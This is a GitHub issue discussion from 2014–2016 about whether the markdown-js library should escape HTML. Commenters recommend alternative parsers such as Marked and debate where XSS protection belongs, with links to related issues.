axefrog · 2014-04-03T15:13:42Z

Guys, there are better alternatives nowadays anyway:
Marked: https://github.com/chjj/marked
MarkdownDeep: http://www.toptensoftware.com/markdowndeep/ / https://www.npmjs.org/package/markdowndeep
Both support HTML and have plenty of great features

codingisacopingstrategy · 2014-04-09T10:51:34Z

That depends on what you are looking for; for a project we needed to extend Markdown with a new dialect, and this was much easier to do in markdown-js than in marked, for example. I’d still be really happy with an HTML supporting markdown.js

foolyoghurt · 2014-09-02T15:22:02Z

@axefrog Thanks for sharing. Marked is awesome!

luishdez · 2014-10-22T05:53:53Z

I agree with the other comments: this parser should not be aware of things like XSS. That's the developer's problem and should be handled by other parts of the application (that's obvious).

Moving to marked too

mansu · 2015-02-18T08:09:13Z

+1 for not escaping html in markdown parser.

If this is not going to be fixed, please say so at the top of the README. I just wasted 2 days playing with this library and need to rewrite my parser now.

ashb mentioned this issue Oct 9, 2013

FIX: HTML blocks should not be surrounded by <p> #139

Closed

This was referenced Dec 14, 2014

[Question] How do I prevent HTML / script injection? #225

Closed

Why escaping HTML? #219

Closed

This was referenced Dec 23, 2014

Better support for fenced code blocks #220

Closed

Don't convert ampersands when they form part of an HTML entity #227

Closed

ghost mentioned this issue May 6, 2016

YouTube video markdown #226

Open
